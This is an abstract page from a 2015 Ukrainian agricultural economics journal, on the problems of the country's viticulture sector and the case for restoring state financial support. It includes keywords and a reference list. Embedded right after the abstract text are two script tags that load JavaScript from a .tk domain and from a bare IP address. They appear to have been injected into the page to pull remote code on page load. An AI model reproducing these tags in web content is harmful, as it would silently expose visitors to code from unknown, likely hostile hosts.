ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.14:634.8
Економіка агропромислового виробництва

Розвиток галузі виноградарства в Україні / Кириллова О. В. // Економіка АПК. - 2015. - № 5 - С. 39

Проаналізовано стан і перспективи державної підтримки галузі виноградарства. В результаті виявлені причини та їх негативний вплив на явища, що сталися в галузі. Виділено найважливіші проблеми галузі виноградарства. Доведено, що однією з багатьох причин виникнення проблем є недостатній рівень державної фінансової підтримки виноградарства, який випливає з порушення організації запровадження державної політики розвитку галузі й недотримання законодавчої та нормативної бази. Розроблено пропозиції щодо необхідності відновлення механізму державної підтримки галузі акумулюванням збору на розвиток виноградарства, садівництва і хмелярства на спеціальному фонді бюджету, закладення суми коштів у бюджет на компенсацію кредитів. Прийняті урядові рішення повинні бути науково обґрунтовані та консолідовані з виробниками винограду й вина, слід посилити контроль за виконанням цих завдань. Табл.: 1. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: галузь виноградарства, державна підтримка, бюджетне фінансування, програма, напрями розвитку, проблеми

Список використаних джерел

 1. Агропромисловий комплекс України – стан, тенденції та перспективи розвитку : інформ.-аналіт. Зб. / [ред. кол. П. Т. Саблук, М. Я. Дем’яненко, О. М. Шпичак]. — К. : ІАЕ УААН, 2002. — Вип. 6. — 648 с.
 2. Власов В.В. Відродження виноградарства – справа державної ваги / В.В. Власов, В.О. Шерер // Сад, виноград і вино України. – 2006. – № 7. – С. 10-13.
 3. Галузева програма розвитку виноградарства та виноробства України на період до 2025 року : Наказ Міністерства аграрної політики України та УААН від 21.07.2008 р. № 444/74.
 4. Краткое исследование рынка вина Украины "От винограда до готового продукта" [Електронний ресурс]. - Режим доступу: http://abbu.com.ua/00704_m.html.
 5. Напрямки підтримки сільського господарства потребують докорінного реформування [Електронний ресурс]. - Режим доступу: http://www.ac-rada.gov.ua.
 6. Постанова Кабінету Міністрів України від 23.07.2009 року № 843 "Про внесення змін до Порядку справляння збору та використання коштів на розвиток виноградарства, садівництва і хмелярства" [Електронний ресурс]. – Режим доступу: http://zakon4.rada.gov.ua.
 7. Пояснювальна записка до проекту Закону України "Про внесення змін до Закону України "Про Державний бюджет України на 2013 рік" щодо розвитку виноградарської, садівничої та хмелярської галузей" [Електронний ресурс]. – Режим доступу: http://w1.c1.rada.gov.ua/pls/zweb2/webproc34?id=&pf35 11=47451&pf35401=267002.
 8. Статистична інформація Державної служби статистики України: Держстат України [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua.
 9. Теорія, політика та практика сільського розвитку; за ред. д-ра екон. наук, чл.-кор. НАНУ О.М. Бородіної, д-ра екон. наук, чл.-кор. УААН І.В. Прокопи. – К.: НАН України; Ін-т екон. та прогнозув., 2010. – 376 с.
 10. Bordeaux statistics database [Electronic resource] // Wine production and sale in figures. – Access regime: http://www.newbordeaux.com/documents/bordeaux_figures.html.
 11. Compendium of International methods of Wine and Must analysis. – International Organization of Vine and Wine (Volume 1). – 2010. – 471 p.
 12. International standard for the labeling of wines and spirits of vitivinicultural origin. – International Organization of Vine and Wine. – 1985. – 15 p.
 13. Pesme J.O. Strategic operations and concentration in the Bordeaux-Aquitaine region / Pesme J.O., Belis-Bergouignan M.C., Corade N. // International Journal of Wine Business Research. – 2010. – Vol. 22. – № 3. – P.22-31.
 14. Chaney I.M. External search effort for wine / Chaney I.M. // International Journal of Wine Marketing. – 2000. – Vol. 12. – № 2 . – Р. 5-21.
Читати статтю: 15_05_39-43.pdf